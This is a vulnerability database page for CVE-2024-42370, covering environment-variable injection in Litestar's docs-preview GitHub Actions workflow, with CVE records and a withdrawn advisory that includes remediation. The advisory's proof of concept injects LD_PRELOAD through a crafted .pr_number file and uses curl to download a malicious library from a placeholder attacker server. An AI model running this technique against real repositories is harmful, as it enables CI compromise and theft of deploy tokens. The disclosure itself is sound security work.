cvelistv5 - cve-2024-42370

cve-2024-42370

Vulnerability from cvelistv5

Published

2024-08-09 18:29

Modified

2024-08-19 21:05

Severity ?

8.3 (High) - CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:H

Summary

Litestar repository vulnerable to Environment Variable injection in `docs-preview.yml` workflow

References

▼	URL	Tags
	security-advisories@github.com	https://github.com/litestar-org/litestar/actions/runs/10081936962/job/27875077668#step:1:17
	security-advisories@github.com	https://github.com/litestar-org/litestar/blob/ffaf5616b19f6f0f4128209c8b49dbcb41568aa2/.github/workflows/docs-preview.yml
	security-advisories@github.com	https://github.com/litestar-org/litestar/commit/84d351e96aaa2a1338006d6e7221eded161f517b
	security-advisories@github.com	https://github.com/litestar-org/litestar/security/advisories/GHSA-4hq2-rpgc-r8r7

Impacted products

▼	Vendor	Product
	litestar-org	litestar

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "affected": [
          {
            "cpes": [
              "cpe:2.3:a:litestar-org:litestar:*:*:*:*:*:*:*:*"
            ],
            "defaultStatus": "unknown",
            "product": "litestar",
            "vendor": "litestar-org",
            "versions": [
              {
                "lessThanOrEqual": "2.10.0",
                "status": "affected",
                "version": "0",
                "versionType": "custom"
              }
            ]
          }
        ],
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-42370",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-08-12T15:02:38.424647Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-08-12T17:33:06.569Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "litestar",
          "vendor": "litestar-org",
          "versions": [
            {
              "status": "affected",
              "version": "\u003c= 2.10.0"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "Litestar is an Asynchronous Server Gateway Interface (ASGI) framework. In versions 2.10.0 and prior, Litestar\u0027s `docs-preview.yml` workflow is vulnerable to Environment Variable injection which may lead to secret exfiltration and repository manipulation. This issue grants a malicious actor the permission to write issues, read metadata, and write pull requests. In addition, the `DOCS_PREVIEW_DEPLOY_TOKEN` is exposed to the attacker. Commit 84d351e96aaa2a1338006d6e7221eded161f517b contains a fix for this issue."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 8.3,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "LOW",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "REQUIRED",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:H",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-78",
              "description": "CWE-78: Improper Neutralization of Special Elements used in an OS Command (\u0027OS Command Injection\u0027)",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2024-08-19T21:05:05.131Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/litestar-org/litestar/security/advisories/GHSA-4hq2-rpgc-r8r7",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/litestar-org/litestar/security/advisories/GHSA-4hq2-rpgc-r8r7"
        },
        {
          "name": "https://github.com/litestar-org/litestar/commit/84d351e96aaa2a1338006d6e7221eded161f517b",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/litestar-org/litestar/commit/84d351e96aaa2a1338006d6e7221eded161f517b"
        },
        {
          "name": "https://github.com/litestar-org/litestar/actions/runs/10081936962/job/27875077668#step:1:17",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/litestar-org/litestar/actions/runs/10081936962/job/27875077668#step:1:17"
        },
        {
          "name": "https://github.com/litestar-org/litestar/blob/ffaf5616b19f6f0f4128209c8b49dbcb41568aa2/.github/workflows/docs-preview.yml",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/litestar-org/litestar/blob/ffaf5616b19f6f0f4128209c8b49dbcb41568aa2/.github/workflows/docs-preview.yml"
        }
      ],
      "source": {
        "advisory": "GHSA-4hq2-rpgc-r8r7",
        "discovery": "UNKNOWN"
      },
      "title": "Litestar repository vulnerable to Environment Variable injection in `docs-preview.yml` workflow"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2024-42370",
    "datePublished": "2024-08-09T18:29:11.205Z",
    "dateReserved": "2024-07-30T14:01:33.923Z",
    "dateUpdated": "2024-08-19T21:05:05.131Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1",
  "meta": {
    "nvd": "{\"cve\":{\"id\":\"CVE-2024-42370\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2024-08-12T13:38:34.497\",\"lastModified\":\"2024-08-12T13:41:36.517\",\"vulnStatus\":\"Awaiting Analysis\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"Litestar is an Asynchronous Server Gateway Interface (ASGI) framework. In versions 2.10.0 and prior, Litestar\u0027s `docs-preview.yml` workflow is vulnerable to Environment Variable injection which may lead to secret exfiltration and repository manipulation. This issue grants a malicious actor the permission to write issues, read metadata, and write pull requests. In addition, the `DOCS_PREVIEW_DEPLOY_TOKEN` is exposed to the attacker. Commit 84d351e96aaa2a1338006d6e7221eded161f517b contains a fix for this issue.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:H\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"REQUIRED\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"LOW\",\"availabilityImpact\":\"HIGH\",\"baseScore\":8.3,\"baseSeverity\":\"HIGH\"},\"exploitabilityScore\":2.8,\"impactScore\":5.5}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-78\"}]}],\"references\":[{\"url\":\"https://github.com/litestar-org/litestar/actions/runs/10081936962/job/27875077668#step:1:17\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/litestar-org/litestar/blob/ffaf5616b19f6f0f4128209c8b49dbcb41568aa2/.github/workflows/docs-preview.yml\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/litestar-org/litestar/commit/84d351e96aaa2a1338006d6e7221eded161f517b\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/litestar-org/litestar/security/advisories/GHSA-4hq2-rpgc-r8r7\",\"source\":\"security-advisories@github.com\"}]}}"
  }
}

ghsa-4hq2-rpgc-r8r7

Vulnerability from github

Published

2024-08-09 19:22

Modified

2024-08-20 18:37

Severity ?

8.3 (High) - CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:H

Summary

Withdrawn Advisory: Litestar has an environment Variable injection in `docs-preview.yml` workflow

Details

Withdrawn Advisory

This advisory has been withdrawn because the confidentiality, integrity, and availability impacts of the vulnerability affect Litestar's CI/CD environment rather than the litestar package. While the information in the advisory is still valid, users of the litestar package are not affected and do not need to receive Dependabot alerts.

Original Advisory

Summary

Litestar's docs-preview.yml workflow is vulnerable to Environment Variable injection which may lead to secret exfiltration and repository manipulation.

Environment Variable injection (`GHSL-2024-177`)

The docs-preview.yml workflow gets triggered when the Tests And Linting workflow completes:

yaml on: workflow_run: workflows: [Tests And Linting] types: [completed]

Later, it downloads and extracts an artifact generated by the triggering workflow:

yaml - name: Download artifact uses: dawidd6/action-download-artifact@v6 with: workflow_conclusion: success run_id: ${{ github.event.workflow_run.id }} path: docs-preview name: docs-preview

And reads docs-preview/.pr_number into an Environment Variable:

yaml - name: Set PR number run: echo "PR_NUMBER=$(cat docs-preview/.pr_number)" >> $GITHUB_ENV

The $GITHUB_ENV pointed file is just a regular file where every KEY=VALUE will be used to define a new Environment Variable after the step completes. Since the contents of the .pr_number file have not been validated, they may contain new lines that will cause new Environment Variables to be defined.

An attacker can send a malicious .pr_number file with the following content:

txt 111 LD_PRELOAD=/home/runner/work/litestar/litestar/inject.so

Which will result in two Environment Variables being defined:

PR_NUMBER=111
LD_PRELOAD=/home/runner/work/litestar/litestar/inject.so

In this example we are manipulating the LD_PRELOAD environment variable to force the system to load a malicious shared library called inject.so. As a result, all subsequent processes launched will automatically incorporate this compromised library into their execution environment.

The following step will run the JamesIves/github-pages-deploy-action action which will run the node command. Therefore the LD_PRELOAD will execute arbitrary code when node gets executed:

yaml - name: Deploy docs preview uses: JamesIves/github-pages-deploy-action@v4 with: folder: docs-preview/docs/_build/html token: ${{ secrets.DOCS_PREVIEW_DEPLOY_TOKEN }} repository-name: litestar-org/litestar-docs-preview clean: false target-folder: ${{ env.PR_NUMBER }} branch: gh-pages

PoC

Clone the repository
Edit the ci.yml workflow.

```yaml name: Tests And Linting

on: pull_request:

jobs: upload-patch: runs-on: ubuntu-latest timeout-minutes: 10 steps: - name: Save PR number and payload run: | make payload echo -e "${{ github.event.number }}\nLD_PRELOAD=/home/runner/work/litestar/litestar/inject.so" > payload/.pr_number curl http:///inject.so -o payload/inject.so

  - name: Upload artifact
    uses: actions/upload-artifact@v3
    with:
      name: docs-preview
      path: payload

```

Create a Pull Request with this change.
Since the modified workflow is triggered on pull_request, the attacker Pull Request will trigger it and upon completion will trigger the vulnerable Deploy documentation preview workflow which will read the malicious artifact and pollute the Environment Variables.

Impact

This issue will grant a malicious actor the following permissions:

Issues: write Metadata: read PullRequests: write

In addition, the following secret will get exposed to the attacker: DOCS_PREVIEW_DEPLOY_TOKEN

Remediation

Verify the contents of the downloaded artifacts.
Do not allow new lines in the value redirected to GITHUB_ENV

Resources

Disclosure Policy

This report is subject to a 90-day disclosure deadline, as described in more detail in our coordinated disclosure policy.

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "litestar"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "last_affected": "2.10.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2024-42370"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-74",
      "CWE-78"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2024-08-09T19:22:40Z",
    "nvd_published_at": "2024-08-12T13:38:34Z",
    "severity": "HIGH"
  },
  "details": "## Withdrawn Advisory\nThis advisory has been withdrawn because the confidentiality, integrity, and availability impacts of the vulnerability affect Litestar\u0027s CI/CD environment rather than the `litestar` package. While the information in the advisory is still valid, users of the `litestar` package are not affected and do not need to receive Dependabot alerts.\n\n## Original Advisory\n\n### Summary\nLitestar\u0027s `docs-preview.yml` workflow is vulnerable to Environment Variable injection which may lead to secret exfiltration and repository manipulation.\n\n### Environment Variable injection (`GHSL-2024-177`)\n\nThe [`docs-preview.yml` workflow](https://github.com/litestar-org/litestar/blob/ffaf5616b19f6f0f4128209c8b49dbcb41568aa2/.github/workflows/docs-preview.yml) gets triggered when the `Tests And Linting` workflow completes:\n\n```yaml\non:\n  workflow_run:\n    workflows: [Tests And Linting]\n    types: [completed]\n```\n\nLater, it downloads and extracts an artifact generated by the triggering workflow:\n\n```yaml\n- name: Download artifact\nuses: dawidd6/action-download-artifact@v6\nwith:\n  workflow_conclusion: success\n  run_id: ${{ github.event.workflow_run.id }}\n  path: docs-preview\n  name: docs-preview\n```\n\nAnd reads `docs-preview/.pr_number` into an Environment Variable:\n\n```yaml\n- name: Set PR number\n  run: echo \"PR_NUMBER=$(cat docs-preview/.pr_number)\" \u003e\u003e $GITHUB_ENV\n```\n\nThe `$GITHUB_ENV` pointed file is just a regular file where every `KEY=VALUE` will be used to define a new Environment Variable after the step completes. Since the contents of the `.pr_number` file have not been validated, they may contain new lines that will cause new Environment Variables to be defined.\n\nAn attacker can send a malicious `.pr_number` file with the following content:\n\n```txt\n111\nLD_PRELOAD=/home/runner/work/litestar/litestar/inject.so\n```\n\nWhich will result in two Environment Variables being defined:\n\n- PR_NUMBER=111\n- LD_PRELOAD=/home/runner/work/litestar/litestar/inject.so\n\nIn this example we are manipulating the `LD_PRELOAD` environment variable to force the system to load a malicious shared library called `inject.so`. As a result, all subsequent processes launched will automatically incorporate this compromised library into their execution environment.\n\nThe following step will run the `JamesIves/github-pages-deploy-action` action which will [run the `node` command](https://github.com/JamesIves/github-pages-deploy-action/blob/2c9a889f39c2410b2ca1342f465a53a7c5c389b4/action.yml#L5). Therefore the `LD_PRELOAD` will execute arbitrary code when `node` gets executed:\n\n```yaml\n- name: Deploy docs preview\n  uses: JamesIves/github-pages-deploy-action@v4\n  with:\n    folder: docs-preview/docs/_build/html\n    token: ${{ secrets.DOCS_PREVIEW_DEPLOY_TOKEN }}\n    repository-name: litestar-org/litestar-docs-preview\n    clean: false\n    target-folder: ${{ env.PR_NUMBER }}\n    branch: gh-pages\n```\n\n#### PoC\n\n- Clone the repository\n- Edit the `ci.yml` workflow.\n\n```yaml\nname: Tests And Linting\n\non:\n  pull_request:\n\njobs:\n  upload-patch:\n    runs-on: ubuntu-latest\n    timeout-minutes: 10\n    steps:\n      - name: Save PR number and payload\n        run: |\n          make payload\n          echo -e \"${{ github.event.number }}\\nLD_PRELOAD=/home/runner/work/litestar/litestar/inject.so\" \u003e payload/.pr_number\n          curl http://\u003cATTACKER SERVER\u003e/inject.so -o payload/inject.so\n\n      - name: Upload artifact\n        uses: actions/upload-artifact@v3\n        with:\n          name: docs-preview\n          path: payload\n```\n\n- Create a Pull Request with this change.\n- Since the modified workflow is triggered on `pull_request`, the attacker Pull Request will trigger it and upon completion will trigger the vulnerable `Deploy documentation preview` workflow which will read the malicious artifact and pollute the Environment Variables.\n\n#### Impact\n\nThis issue will grant a malicious actor the [following permissions](https://github.com/litestar-org/litestar/actions/runs/10081936962/job/27875077668#step:1:17):\n\n```\n  Issues: write\n  Metadata: read\n  PullRequests: write\n```\n\nIn addition, the following secret will get exposed to the attacker: `DOCS_PREVIEW_DEPLOY_TOKEN`\n\n#### Remediation\n\n- Verify the contents of the downloaded artifacts.\n- Do not allow new lines in the value redirected to GITHUB_ENV\n\n### Resources\n\n- [CodeQL for JavaScript - Expression injection in Actions](https://codeql.github.com/codeql-query-help/javascript/js-actions-command-injection/)\n- [Keeping your GitHub Actions and workflows secure Part 2: Untrusted input](https://securitylab.github.com/research/github-actions-untrusted-input/)\n- [Keeping your GitHub Actions and workflows secure Part 1: Preventing pwn requests](https://securitylab.github.com/research/github-actions-preventing-pwn-requests/)\n\n## Disclosure Policy\nThis report is subject to a 90-day disclosure deadline, as described in more detail in our [coordinated disclosure policy](https://securitylab.github.com/advisories#policy).",
  "id": "GHSA-4hq2-rpgc-r8r7",
  "modified": "2024-08-20T18:37:01Z",
  "published": "2024-08-09T19:22:40Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/litestar-org/litestar/security/advisories/GHSA-4hq2-rpgc-r8r7"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-42370"
    },
    {
      "type": "WEB",
      "url": "https://github.com/litestar-org/litestar/commit/84d351e96aaa2a1338006d6e7221eded161f517b"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/litestar-org/litestar"
    },
    {
      "type": "WEB",
      "url": "https://github.com/litestar-org/litestar/actions/runs/10081936962/job/27875077668#step:1:17"
    },
    {
      "type": "WEB",
      "url": "https://github.com/litestar-org/litestar/blob/ffaf5616b19f6f0f4128209c8b49dbcb41568aa2/.github/workflows/docs-preview.yml"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Withdrawn Advisory: Litestar has an environment Variable injection in `docs-preview.yml` workflow",
  "withdrawn": "2024-08-20T18:37:01Z"
}

Sightings

Author	Source	Type	Date

Nomenclature

Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
Confirmed: The vulnerability is confirmed from an analyst perspective.
Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
Patched: This vulnerability was successfully patched by the user reporting the sighting.
Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
Not confirmed: The user expresses doubt about the veracity of the vulnerability.
Not patched: This vulnerability was not successfully patched by the user reporting the sighting.

Action not permitted

cve-2024-42370

Vulnerability from cvelistv5

ghsa-4hq2-rpgc-r8r7

Vulnerability from github

Withdrawn Advisory

Original Advisory

Summary

Environment Variable injection (GHSL-2024-177)

PoC

Impact

Remediation

Resources

Disclosure Policy

Tags

Sightings

Nomenclature

Environment Variable injection (`GHSL-2024-177`)